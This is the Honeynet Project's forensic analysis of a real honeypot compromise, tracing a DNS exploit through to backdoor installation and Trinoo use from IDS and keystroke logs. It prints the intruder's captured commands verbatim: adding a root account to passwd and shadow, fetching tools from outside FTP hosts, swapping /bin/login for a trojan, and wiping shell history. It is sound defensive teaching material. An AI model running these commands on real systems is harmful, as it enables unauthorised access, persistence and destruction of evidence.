Know Your Enemy: A Forensic Analysis
|
|
|
- Abel Norman
- 10 years ago
- Views:
Transcription
1 Know Your Enemy: A Forensic Analysis The Study of an Attack Honeynet Project Last Modified: 23 May 2000 This paper is a continuation of the Know Your Enemy series. The first three papers covered the tools and tactics of the black-hat community. This paper, the fourth of the series, studies step by step a successful attack of a system. However, instead of focusing on the tools and tactics used, we will focus on how we learned what happened and pieced the information together. The purpose is to give you the forensic skills necessary to analyze and learn on your own the threats your organization faces. There is also an online, interactive version of this paper published by MSNBC. Background The information covered here was obtained through the use of a honeypot. The honeypot was a default server installation of Red Hat 6.0. No modifications were made to the default install, so the vulnerabilities discussed here exist on any default RH 6.0 installation. Also, none of the data presented here has been sanitized. All IP addresses, user accounts, and keystrokes discussed here are real. This is done on purpose to both validate the data and give a better understanding of forensic analysis. Only the passwords have been modified to protect the compromised systems. All sniffer information presented here is in snort format. Snort is my sniffer and IDS system of choice, due to its flexibility, capabilities, and price (its free). All actions commited by the black-hat were captured with snort. I use the IDS signatures supplied by Max Vision at You can query his arachnids database for more information on all the alerts discussed throughout this paper. You can find my snort configuration and signature file (including the command line options I use) here. Once you are done reading the paper, you can conduct your own forensic analysis, as I have supplied all the raw data. As you read this paper, take note of how many different systems the black-hat uses. Also, throughout this paper, the black-hat is identified as she, but we have no idea what the true gender is. The Attack On 26 April, at 06:43 snort alerted me that one of my systems had be attacked with a 'noop' attack. Packet payloads containing noops are an indication of a buffer overflow attack. In this case, snort had detected the attack and logged the alert to my /var/log/messages file (which is monitored by swatch). Note: throughout this paper, the IP address is the IP address of the honeypot. All other systems are the IP addresses used by the black-hat. Apr 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: :1351 -> :53 My honeypots receive numerous probes, scans and queries on a daily basis. However, an alert like this gets my immediate attention, as it indicates a system may have been compromised. Sure enough, less then two minutes later system logs indicate the system is compromised, as our attacker initiates a connection and logins to the box. Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506)
2 Our intruder has gained super user access and now controls the system. How was this accomplished, what happened? We will now begin our forensic analysis and put the pieces together, step by step. The Analysis When studying an attack, the best place to start is the beginning, where did the black-hat start? Blackhats normally start with information gathering, they need to determine what vulnerabilities exist before they can strike. If your system has been compromised, this is normally not the first time the black-hat has communicated with that system. Most attacks involve some type of information gathering before the attack is launched. So, this is where we will start, the black-hat's information gathering stage. If we look at the alert above, the attack was on port 53. This indicates a DNS attack was launched on our system. So I will begin by looking through my snort alerts and find possible information probes for DNS. We find a DNS version query probe coming from the same system that attacked us. Apr 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: :4499 -> :53 Apr 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: :4630 -> :53 Notice the date of the probe, April 25. Our system was attacked April 26, from the same system. Our system was compromised the day after the probe. I am guessing that an automated tool was used by our black-hat to scan numerous systems for a known DNS vulnerability. After the scan was ran, the black-hat reviewed the results, identified vulnerable systems (including ours) and then launched her exploit. We have now pieced together the first part of our story. Our black-hat scanned us on 25 April, then exploited the system the following day. Based on our IDS alerts, it appears we were hit by a script kiddie with a well known DNS vulnerability. But how was the attack launched, and how does it work? Lets find out. The Exploit Like most commercial IDS systems, snort has the capability of showing us the packet load data of all IP packets. We will use this capability to conduct an analysis of the exploit. The exploit information was obtained from the snort logs (stored in tcpdump binary format). I queried the snort log and began reviewing the packets starting when the attack was launched. I did not limit my information query to the host , as the attacker may have used other systems. This is in fact the case, as our black-hat used at least three different systems to run the exploit. The goal of the exploit is to gain a root shell on the remote system. Once the black-hat gains a root shell, they can run any command as root. Normally an account is placed in the /etc/passwd and /etc/shadow file. You can find both the exploit and remote commands executed in the detailed forensic analysis. Once the exploit was ran and a root shell obtained, the following commands were ran as root. cd /; uname -a; pwd; id; Linux apollo.uicmba.edu #1 Mon Apr 19 22:21:09 EDT 1999 i586 unknown / uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) echo "twin::506:506::/home/twin:/bin/bash" >> /etc/passwd echo "twin:w3nt2h0b6ajm2:::::::" >> /etc/shadow echo "hantu::0:0::/:/bin/bash" >> /etc/passwd echo "hantu:w3nt2h0b6ajm2:::::::" >> /etc/shadow Our black-hat runs several commands as root. First, she confirms the system she is on (uname -a), the directory (pwd) and then confirms her uid (id). She then adds two user accounts to the system, twin and hantu, both with the same password. Note that twin has the UID of 506 and hantu has the UID of 0 (on a side note, hantu means ghost in Indonesian). Remeber, most systems do not let UID 0 telnet to the box. So she had to create an account that would give her remote access, then another account that would give her UID 0. So, our black-hat ran an exploit on DNS, gained a root shell, then inserted two accounts.
3 Within 90 seconds of the exploit she telnets into the box and gains root access (see timestamps of logs below). So, what does she do next? Apr 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: :1351 -> :53 Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506) Gaining Access Fortunately for us, telnet is a plaintext protocol, the data is not encrypted. This means we can decode the sniffer traces and capture all the her keystrokes. Snort has already done this for us, another reason I prefer snort. By analyzing the keystrokes snort captured of the telnet sessions, we can determine what our black-hat does. What I like best about decoding telnet sessions as we capture not only STDIN (the keystrokes) but STDOUT and STDER. Lets review the telnet sessions and identify the black-hats activities (comments in RED). First, our friend telnets to the box (from ) as twin and then gains superuser access ashantu. Remeber, she cannot just telnet in as hantu as UID 0 is restricted for remote access. #'!"'!"# ' 9600,9600'VT5444VT5444 Red Hat Linux release 6.0 (Shedwig) Kernel on an i586 login: twin Password: Password: hax0r No directory /home/twin! Logging in with home = "/". [twin@apollo /]$ su hantu Password: Password: hax0r Next, our friend ftps to another system to get her toolkit. [root@apollo /]# ftp Connected to linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready. Name ( :twin): welek 331 Password required for welek. Password:password 230 User welek logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> get bj.c local: bj.c remote: bj.c 200 PORT command successful. 150 Opening BINARY mode data connection for bj.c (1010 bytes). 226 Transfer complete bytes received in secs (8.6 Kbytes/sec) ftp> quit 221-You have transferred 1010 bytes in 1 files. 221-Total traffic for this session was 1421 bytes in 1 transfers. 221-Thank you for using the FTP service on linux. 221 Goodbye. Third, she grabs her backdoor, compiles bj.c, and installs it as a replacement for /sbin/login. Notice all the commands executed at the command prompt for the compile. It appears that all the compile commands were executed 'cut and paste' style.
4 /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login / usr/bin/xstatcp /bin/login /usr/bin/old rm /bin/loginchmod 555 /usr/bin/xstatchgrp bin /usr/bin/ xstatmv login /bin/loginrm bj.cgcc -o login bj.c bj.c:16: unterminated string or character constant bj.c:12: possible real start of unterminated constant She now attempts to implement the compiled backdoor [root@apollo /]# chown root:bin login chown: login: No such file or directory root@apollo /]# chmod 4555 login chmod: login: No such file or directory root@apollo /]# chmod u-w login chmod: login: No such file or directory root@apollo /]# cp /bin/login /usr/bin/xstat root@apollo /]# cp /bin/login /usr/bin/old root@apollo /]# rm /bin/login root@apollo /]# chmod 555 /usr/bin/xstat root@apollo /]# chgrp bin /usr/bin/xstat root@apollo /]# mv login /bin/login mv: login: No such file or directory root@apollo /]# rm bj.c Dooh! She just can't get it right, lets try again. She ftp's to the site re-downloads the backdoor. [root@apollo /]# ftp Connected to linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready. Name ( :twin): [root@apollo /]# ftp Connected to linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready. Name ( :twin): welek 331 Password required for welek. Password:331 Password required for welek. Password:password 230 User welek logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> get bj.c qulocal: bj.c remote: bj.c 200 PORT command successful. u150 Opening BINARY mode data connection for bj.c (1011 bytes). 226 Transfer complete bytes received in secs (7.3 Kbytes/sec) ftp> itit 221-You have transferred 1011 bytes in 1 files. 221-Total traffic for this session was 1422 bytes in 1 transfers. 221-Thank you for using the FTP service on linux. 221 Goodbye. This is now her second attempt at compiling the backdoor. Notice the exact same "cut and paste" commands are used. [root@apollo /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login / usr/bin/xstatcp /bin/login /usr/bin/old rm /bin/loginchmod 555 /usr/bin/xstatchgrp bin /usr/bin/ xstatmv login /bin/login rm bj.cgcc -o login bj.c
5 bj.c: In function `owned': bj.c:16: warning: assignment makes pointer from integer without a cast Now we see the compiled backdoor implemented. The valid copy of /bin/login is moved to /usr/bin/xstat, while the compiled trojan bj.c is used to replace /bin/login. This is the backdoor. This trojan allows anyone with the TERM setting of vt9111 unauthorized access. [root@apollo /]# chown root:bin login root@apollo /]# chmod 4555 login root@apollo /]# chmod u-w login root@apollo /]# cp /bin/login /usr/bin/xstat cp: /bin/login: No such file or directory root@apollo /]# cp /bin/login /usr/bin/old cp: /bin/login: No such file or directory root@apollo /]# rm /bin/login rm: cannot remove `/bin/login': No such file or directory root@apollo /]# chmod 555 /usr/bin/xstat root@apollo /]# chgrp bin /usr/bin/xstat root@apollo /]# mv login /bin/login Now she covers her moves. I believe this is scripted, cut and paste. Look at all the commands she executed at a single command prompt. Also, I believe this is a 'generic' clean up script, notice how it tries to remove files that do not exist (such as /tmp/h). [root@apollo /]# rm bj.c [root@apollo /]# [root@apollo /]# ps -aux grep inetd ; ps -aux grep portmap ; rm /sbin/portmap ; rm / tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf.bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbin/namedps -aux grep inetd ; ps -aux grep portmap ; rm /sbin/por<grep inetd ; ps -aux grep portmap ; rm /sbin/ port map ; rm /tmp/h ; rm /usr<p portmap ; rm /sbin/portmap ; rm /tmp/h ; rm / usr/ sbin/rpc.portmap ; rm -rf<ap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm - rf.bash* ; rm -rf /root/.ba<bin/rpc.portmap ; rm -rf.bash* ; rm -rf /root/.bas h_history ; rm -rf /usr/s<bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sb in/named 359? 00:00:00 inetd 359? 00:00:00 inetd rm: cannot remove `/tmp/h': No such file or directory rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory [root@apollo /]# ps -aux grep portmap [root@apollo /]# [root@apollo /]# ps -aux grep inetd ; ps -aux grep portmap ; rm /sbin/portmap ; rm / tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf.bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbin/namedps -aux grep inetd ; ps -aux grep portmap ; rm /sbin/por<grep inetd ; ps -aux grep portmap ; rm /sbin/ port map ; rm /tmp/h ; rm /usr<p portmap ; rm /sbin/portmap ; rm /tmp/h ; rm / usr/ sbin/rpc.portmap ; rm -rf<ap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm - rf.bash* ; rm -rf /root/.ba<bin/rpc.portmap ; rm -rf.bash* ; rm -rf /root/.bas h_history ; rm -rf /usr/s<bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sb in/named 359? 00:00:00 inetd rm: cannot remove `/sbin/portmap': No such file or directory rm: cannot remove `/tmp/h': No such file or directory >rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory [root@apollo /]# rm: cannot remove `/sbin/portmap': No such file or directory I find this interesting. Our black-hat's generic clean up script generated errors as it attempted to remove files that did not exist. I belive our blackhat saw these errors and became concerened, because she then attempts to manually remove these same files, even though they do not exist. rm: cannot remove `/tmp/h': No such file or directory rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory root@apollo /]# rm: cannot remove `/sbin/portmap': No such file or directory
6 rm: cannot remove `/tmp/h': No such file or directory rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory /]# exit exit /]$ exit logout That's it, our friend has installed a backdoor, bj.c. The backdoor allows unauthenticated users in based on the TERM setting, in this case VT9111. Once completed, she logged out from the system. After leaving the system, the black hat made several more connections and modificaitons to the systems. Review the raw data to review the black-hats keystrokes. Trinoo, The Return Once the system had been compromised, I took it offline to review the data (such as Tripwire). However, I noticed over the next week that a variety of systems were attempting to telnet to the box. Apparently the black-hat wanted back in, most likely to use the compromised system for more nefarious activity. So, I brought the compromised box back online, curious to see if the black-hat would return and what she would do. Sure enough, almost two weeks later, she returned. Once again, we captured all the keystrokes using snort. Review the following telnet sessions and learn how our compromised system was to be used as a Trinoo client. On May 9, 10:45 am, our friend telnets in from Note how she uses the backdoor VT9111 to get into the system, bypassing authentication.!"' #'!"# ' 9600,9600'VT9111VT9111 Red Hat Linux release 6.0 (Shedwig) Kernel on an i586 [root@apollo /]# ls bin cdrom etc home lost+found proc sbin usr boot dev floppy lib mnt root tmp var Once on the system, she attempts to use DNS. However, DNS is still broken on the box. Remember, DNS was exploited to gain root access, so the system can no longer resolve domain names. [root@apollo /]# nslookup magix [root@apollo /]# nslookup irc.powersurf.com Server: zeus-internal.uicmba.edu Address: The black-hat ftp's to a system in Singapore and downloads a new tool kit. Notice the 'hidden' directory.s she creates to store the toolkit. [root@apollo /]# mkdir.s root@apollo /]# cd.s root@apollo /.s]# ftp nusnet dynip.nus.edu.sg ftp: nusnet dynip.nus.edu.sg: Unknown host ftp> qquituit root@apollo /.s]# ftpr login: ftrp: command not found root@apollo /.s]# root@apollo /.s]# ftp Connected to
7 220 nusnet dynip.nus.edu.sg FTP server (Version wu vr17(1) Mon Apr 19 09:21:53 EDT 1999) ready. She gains access with the same user name that was inserted in our box. Name ( :root): twin 331 Password required for twin. Password:hax0r 230 User twin logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> get d.tar.gz local: d.tar.gz remote: d.tar.gz 200 PORT command successful. 150 Opening BINARY mode data connection for d.tar.gz (8323 bytes). 150 Opening BINARY mode data connection for d.tar.gz (8323 bytes). 226 Transfer complete bytes received in 1.36 secs (6 Kbytes/sec) ftp> quit 221-You have transferred 8323 bytes in 1 files. 221-Total traffic for this session was 8770 bytes in 1 transfers. 221-Thank you for using the FTP service on nusnet dynip.nus.edu.sg. 221 Goodbye. [root@apollo /.s]# gunzip d* [root@apollo /.s]# tar -xvf d* daemon/ daemon/ns.c daemon/ns [root@apollo /.s]# rm -rf d.tar root@apollo /.s]# cd daemon [root@apollo daemon]# chmod u+u+x nsx ns root@apollo daemon]#./ns Our black-hat has just installed and started Trinoo client. Next, she attempts to hop to another compromised system. Notice how she sets her VT TERM. This system most likely also has a backdoor. The connection fails since DNS is not working. [root@apollo daemon]# TERM=vt1711 [root@apollo daemon]# telnet macau.hkg.com macau.hkg.com: Unknown host root@apollo daemon]# exit exit Our friend leaves, only to return later from yet a different system ( ) and attempt more michief.!"' #'!"# ' 9600,9600'VT9111VT9111 Red Hat Linux release 6.0 (Shedwig) Kernel on an i586 [apollo /]# TERM=vt9111 telnet ns2.cpcc.cc.nc.us ns2.cpcc.cc.nc.us: Unknown host apollo /}#telnet Trying Connected to Escape character is '^]'. Connection closed by foreign host.
8 /]# TERM=vt7877 /]# telnet sparky.w /]# exit exit Following this, several attempts were made to use the system as a Trinoo attack against other systems. At this point I disconnected the system. The black-hat intended to use the compromised system for destructive purposes and little more could be gained from the monitoring the connection. May 9 11:03:20 lisa snort[2370]: IDS/197/trin00-master-to-daemon: :2984 -> :27444 May 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: :1025 -> :31335 May 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: :2988 -> :27444 May 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: :1027 -> :31335 May 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: :3076 -> :27444 May 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: :1028 -> :31335 Summary We have just covered step by step how a honeypot was compromised, backdoored, and eventually used for a Trinoo attack. On 25 April, the black-hat first scanned the honeypot for which version of DNS version it was running. The following day, on 26 April, she executed the NXT-Named exploit to gain a root shell (see the NXT-Howto for a black-hat HOWTO on the exploit). Once she gained a root shell, she created two system accounts, twin and hantu. Following this she immediately telneted to the box, gained super user access, then downloaded and installed her backdoor, bj.c. She then executed a script to cover her tracks and then left the system. Over the following weeks she attempted to connect to the system, however it was offline. Finally, on May 9 she gained access, installed and then executed Trinoo. At this point the honeypot was taken offline for good. The majority of forensics was conducted using system logs from the compromised system and snort logs and alerts. Several other people have contributed additional analysis of the attack. Conclusion We have just covered a step by step analysis of how a honeypot compromised. The goal was to determine how the system was compromised using forensic anaylisis of system and IDS logs. By analyzing this attack, you should have a better understanding of what to expect and look for when analyzing a system attack. If you would like to learn more about how this information was obtained, check out To Build A Honeypot. I would like to thank both Marty Roesch and Max Vision for their contribution to the security community. What I have learned here would not have been possible without their hard work. All logs and information were forwarded to CERT before this information was released. Also, attempts were made to contact all IPs involved in the attack. The Honeynet Project
Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.
CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files
Computer Forensics Process
About term paper and course project! Primary objectives I expect that you can learn not only the knowledge but also the research approaches such that you can have a better preparation to start your own
Penetration Testing Report Client: Business Solutions June 15 th 2015
Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: [email protected]
Linux FTP Server Setup
17Harrison_ch15.qxd 2/25/05 10:06 AM Page 237 C H A P T E R 15 Linux FTP Server Setup IN THIS CHAPTER FTP Overview Problems with FTP and Firewalls How to Download and Install VSFTPD How to Get VSFTPD Started
Unix/Linux Forensics 1
Unix/Linux Forensics 1 Simple Linux Commands date display the date ls list the files in the current directory more display files one screen at a time cat display the contents of a file wc displays lines,
Worms, Trojan Horses and Root Kits
Worms, Trojan Horses and Root Kits Worms A worm is a type of Virus that is capable of spreading and replicating itself autonomously over the internet. Famous Worms Morris Internet worm (1988) Currently:
Network Forensics: Log Analysis
Network Forensics: Analysis Richard Baskerville Agenda P Terms & -based Tracing P Application Layer Analysis P Lower Layer Analysis Georgia State University 1 2 Two Important Terms PPromiscuous Mode
Second-generation (GenII) honeypots
Second-generation (GenII) honeypots Bojan Zdrnja CompSci 725, University of Auckland, Oct 2004. [email protected] Abstract Honeypots are security resources which trap malicious activities, so they
IDS and Penetration Testing Lab ISA656 (Attacker)
IDS and Penetration Testing Lab ISA656 (Attacker) Ethics Statement Network Security Student Certification and Agreement I,, hereby certify that I read the following: University Policy Number 1301: Responsible
Contents. vii. Preface. P ART I THE HONEYNET 1 Chapter 1 The Beginning 3. Chapter 2 Honeypots 17. xix
Honeynet2_bookTOC.fm Page vii Monday, May 3, 2004 12:00 PM Contents Preface Foreword xix xxvii P ART I THE HONEYNET 1 Chapter 1 The Beginning 3 The Honeynet Project 3 The Information Security Environment
Project Proposal Active Honeypot Systems By William Kilgore University of Advancing Technology. Project Proposal 1
Project Proposal Active Honeypot Systems By William Kilgore University of Advancing Technology Project Proposal 1 Project Proposal 2 Abstract Honeypot systems are readily used by organizations large and
Secure File Transfer Installation. Sender Recipient Attached FIles Pages Date. Development Internal/External None 11 6/23/08
Technical Note Secure File Transfer Installation Sender Recipient Attached FIles Pages Date Development Internal/External None 11 6/23/08 Overview This document explains how to install OpenSSH for Secure
86-10-15 The Self-Hack Audit Stephen James Payoff
86-10-15 The Self-Hack Audit Stephen James Payoff As organizations continue to link their internal networks to the Internet, system managers and administrators are becoming increasingly aware of the need
SSL Tunnels. Introduction
SSL Tunnels Introduction As you probably know, SSL protects data communications by encrypting all data exchanged between a client and a server using cryptographic algorithms. This makes it very difficult,
Threat Advisory: Accellion File Transfer Appliance Vulnerability
Threat Advisory: Accellion File Transfer Appliance Vulnerability Niara Threat Advisories provide timely information regarding new attacks along with how Niara helps companies quickly detect an attack to
Intrusion Detection Systems (IDS)
Intrusion Detection Systems (IDS) What are They and How do They Work? By Wayne T Work Security Gauntlet Consulting 56 Applewood Lane Naugatuck, CT 06770 203.217.5004 Page 1 6/12/2003 1. Introduction Intrusion
Chapter 11 Phase 5: Covering Tracks and Hiding
Chapter 11 Phase 5: Covering Tracks and Hiding Attrition Web Site Contains an archive of Web vandalism attacks http://www.attrition.org/mirror/attrition Most attackers, however, wish to keep low profile
P Principles of Network Forensics P Terms & Log-based Tracing P Application Layer Log Analysis P Lower Layer Log Analysis
Agenda Richard Baskerville P Principles of P Terms & -based Tracing P Application Layer Analysis P Lower Layer Analysis Georgia State University 1 2 Principles Kim, et al (2004) A fuzzy expert system for
An Introduction to the Linux Command Shell For Beginners
An Introduction to the Linux Command Shell For Beginners Presented by: Victor Gedris In Co-Operation With: The Ottawa Canada Linux Users Group and ExitCertified Copyright and Redistribution This manual
Exercise 7 Network Forensics
Exercise 7 Network Forensics What Will You Learn? The network forensics exercise is aimed at introducing you to the post-mortem analysis of pcap file dumps and Cisco netflow logs. In particular you will:
Fred Hantelmann LINUX. Start-up Guide. A self-contained introduction. With 57 Figures. Springer
Fred Hantelmann LINUX Start-up Guide A self-contained introduction With 57 Figures Springer Contents Contents Introduction 1 1.1 Linux Versus Unix 2 1.2 Kernel Architecture 3 1.3 Guide 5 1.4 Typographical
Secure Shell Demon setup under Windows XP / Windows Server 2003
Secure Shell Demon setup under Windows XP / Windows Server 2003 Configuration inside of Cygwin $ chgrp Administrators /var/{run,log,empty} $ chown Administrators /var/{run,log,empty} $ chmod 775 /var/{run,log}
Exercises: FreeBSD: Apache and SSL: pre SANOG VI Workshop
14/01/05 file:/data/hervey/docs/pre-sanog/web/ha/security/apache-ssl-exercises.html #1 Exercises Exercises: FreeBSD: Apache and SSL: pre SANOG VI Workshop 1. Install Apache with SSL support 2. Configure
Running a Default Vulnerability Scan SAINTcorporation.com
SAINT Running a Default Vulnerability Scan A Step-by-Step Guide www.saintcorporation.com Examine. Expose. Exploit. Install SAINT Welcome to SAINT! Congratulations on a smart choice by selecting SAINT s
Introduction to Operating Systems
Introduction to Operating Systems It is important that you familiarize yourself with Windows and Linux in preparation for this course. The exercises in this book assume a basic knowledge of both of these
Host Hardening. OS Vulnerability test. CERT Report on systems vulnerabilities. (March 21, 2011)
Host Hardening (March 21, 2011) Abdou Illia Spring 2011 CERT Report on systems vulnerabilities Source: CERT Report @ http://www.kb.cert.org/vuls/bymetric 2 OS Vulnerability test Source: http://www.omninerd.com/articles/2006_operating_system_vulnerabilit
How to build and use a Honeypot. Ralph Edward Sutton, Jr. DTEC 6873 Section 01
How to build and use a Honeypot By Ralph Edward Sutton, Jr DTEC 6873 Section 01 Abstract Everybody has gotten hacked one way or another when dealing with computers. When I ran across the idea of a honeypot
CONNECTING TO DEPARTMENT OF COMPUTER SCIENCE SERVERS BOTH FROM ON AND OFF CAMPUS USING TUNNELING, PuTTY, AND VNC Client Utilities
CONNECTING TO DEPARTMENT OF COMPUTER SCIENCE SERVERS BOTH FROM ON AND OFF CAMPUS USING TUNNELING, PuTTY, AND VNC Client Utilities DNS name: turing.cs.montclair.edu -This server is the Departmental Server
Contents III: Contents II: Contents: Rule Set Based Access Control (RSBAC) 4.2 Model Specifics 5.2 AUTH
Rule Set Based Access Control (RSBAC) Linux Kernel Security Extension Tutorial Amon Ott Contents: 1 Motivation: Why We Need Better Security in the Linux Kernel 2 Overview of RSBAC 3 How
2 Advanced Session... Properties 3 Session profile... wizard. 5 Application... preferences. 3 ASCII / Binary... Transfer
Contents I Table of Contents Foreword 0 Part I SecEx Overview 3 1 What is SecEx...? 3 2 Quick start... 4 Part II Configuring SecEx 5 1 Session Profiles... 5 2 Advanced Session... Properties 6 3 Session
TEL2821/IS2150: INTRODUCTION TO SECURITY Lab: Operating Systems and Access Control
TEL2821/IS2150: INTRODUCTION TO SECURITY Lab: Operating Systems and Access Control Version 3.4, Last Edited 9/10/2011 Students Name: Date of Experiment: Read the following guidelines before working in
information security and its Describe what drives the need for information security.
Computer Information Systems (Forensics Classes) Objectives for Course Challenges CIS 200 Intro to Info Security: Includes managerial and Describe information security and its critical role in business.
IDS and Penetration Testing Lab ISA 674
IDS and Penetration Testing Lab ISA 674 Ethics Statement Network Security Student Certification and Agreement I,, hereby certify that I read the following: University Policy Number 1301: Responsible Use
1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained
home Network Vulnerabilities Detail Report Grouped by Vulnerability Report Generated by: Symantec NetRecon 3.5 Licensed to: X Serial Number: 0182037567 Machine Scanned from: ZEUS (192.168.1.100) Scan Date:
Running a Default Vulnerability Scan
Running a Default Vulnerability Scan A Step-by-Step Guide www.saintcorporation.com Examine. Expose. Exploit. Welcome to SAINT! Congratulations on a smart choice by selecting SAINT s integrated vulnerability
Some Tools for Computer Security Incident Response Team (CSIRT)
Some Tools for Computer Security Incident Response Team (CSIRT) AfNOG 12 30 th May 2011 10 th June 2011 Tanzania By Marcus K. G. Adomey Overview Some Unix Commands Some Selected Tools Snort AirSnort hping
USEFUL UNIX COMMANDS
cancel cat file USEFUL UNIX COMMANDS cancel print requested with lp Display the file cat file1 file2 > files Combine file1 and file2 into files cat file1 >> file2 chgrp [options] newgroup files Append
Lab 1: Introduction to the network lab
CSCI 312 - DATA COMMUNICATIONS AND NETWORKS FALL, 2014 Lab 1: Introduction to the network lab NOTE: Be sure to bring a flash drive to the lab; you will need it to save your data. For this and future labs,
"EZHACK" POPULAR SMART TV DONGLE REMOTE CODE EXECUTION
"EZHACK" POPULAR SMART TV DONGLE REMOTE CODE EXECUTION CHECK POINT ALERTED EZCAST THAT ITS SMART TV DONGLE, WHICH IS USED BY APPROXIMATELY 5 MILLION USERS, IS EXPOSED TO SEVERE REMOTE CODE EXECUTION VULNERABILITIES
HoneyBOT User Guide A Windows based honeypot solution
HoneyBOT User Guide A Windows based honeypot solution Visit our website at http://www.atomicsoftwaresolutions.com/ Table of Contents What is a Honeypot?...2 How HoneyBOT Works...2 Secure the HoneyBOT Computer...3
Using Network Attached Storage with Linux. by Andy Pepperdine
Using Network Attached Storage with Linux by Andy Pepperdine I acquired a WD My Cloud device to act as a demonstration, and decide whether to use it myself later. This paper is my experience of how to
Shellshock. Oz Elisyan & Maxim Zavodchik
Shellshock By Oz Elisyan & Maxim Zavodchik INTRODUCTION Once a high profile vulnerability is released to the public, there will be a lot of people who will use the opportunity to take advantage on vulnerable
How To Set Up A Network Map In Linux On A Ubuntu 2.5 (Amd64) On A Raspberry Mobi) On An Ubuntu 3.5.2 (Amd66) On Ubuntu 4.5 On A Windows Box
CSC-NETLAB Packet filtering with Iptables Group Nr Name1 Name2 Name3 Date Instructor s Signature Table of Contents 1 Goals...2 2 Introduction...3 3 Getting started...3 4 Connecting to the virtual hosts...3
Viking VPN Guide Linux/UNIX
Viking VPN Guide Linux/UNIX Table Of Contents 1 : VPN Questions answered 2 : Installing the Linux Client 3 : Connecting with the Linux Client 4 : Reporting Problems Version 1.0 : 10/27/2010 Information
CASHNet Secure File Transfer Instructions
CASHNet Secure File Transfer Instructions Copyright 2009, 2010 Higher One Payments, Inc. CASHNet, CASHNet Business Office, CASHNet Commerce Center, CASHNet SMARTPAY and all related logos and designs are
4PSA Total Backup 3.0.0. User's Guide. for Plesk 10.0.0 and newer versions
4PSA Total Backup 3.0.0 for Plesk 10.0.0 and newer versions User's Guide For more information about 4PSA Total Backup, check: http://www.4psa.com Copyright 2009-2011 4PSA. User's Guide Manual Version 84359.5
Security: Attack and Defense
Security: Attack and Defense Aaron Hertz Carnegie Mellon University Outline! Breaking into hosts! DOS Attacks! Firewalls and other tools 15-441 Computer Networks Spring 2003 Breaking Into Hosts! Guessing
File Transfer Protocol
File Transfer Protocol The File Transfer Protocol (FTP) is used as one of the most common means of copying files between servers over the Internet. Most web based download sites use the built in FTP capabilities
CS 356 Lecture 17 and 18 Intrusion Detection. Spring 2013
CS 356 Lecture 17 and 18 Intrusion Detection Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists
Unix Sampler. PEOPLE whoami id who
Unix Sampler PEOPLE whoami id who finger username hostname grep pattern /etc/passwd Learn about yourself. See who is logged on Find out about the person who has an account called username on this host
Evaluating Intrusion Detection Systems without Attacking your Friends: The 1998 DARPA Intrusion Detection Evaluation
Evaluating Intrusion Detection Systems without Attacking your Friends: The 1998 DARPA Intrusion Detection Evaluation R. K. Cunningham, R. P. Lippmann, D. J. Fried, S. L. Garfinkel, I. Graf, K. R. Kendall,
SSH and FTP on Ubuntu 9.04. WNYLUG Neal Chapman 09/09/2009
SSH and FTP on Ubuntu 9.04 WNYLUG Neal Chapman 09/09/2009 SSH (Secure Shell) Secure Shell or SSH is a network protocol that allows data to be exchanged using a secure channel between two networked devices.
Linux System Administration on Red Hat
Linux System Administration on Red Hat Kenneth Ingham September 29, 2009 1 Course overview This class is for people who are familiar with Linux or Unix systems as a user (i.e., they know file manipulation,
Module II. Internet Security. Chapter 7. Intrusion Detection. Web Security: Theory & Applications. School of Software, Sun Yat-sen University
Module II. Internet Security Chapter 7 Intrusion Detection Web Security: Theory & Applications School of Software, Sun Yat-sen University Outline 7.1 Threats to Computer System 7.2 Process of Intrusions
AlienVault Unified Security Management (USM) 4.x-5.x. Deploying HIDS Agents to Linux Hosts
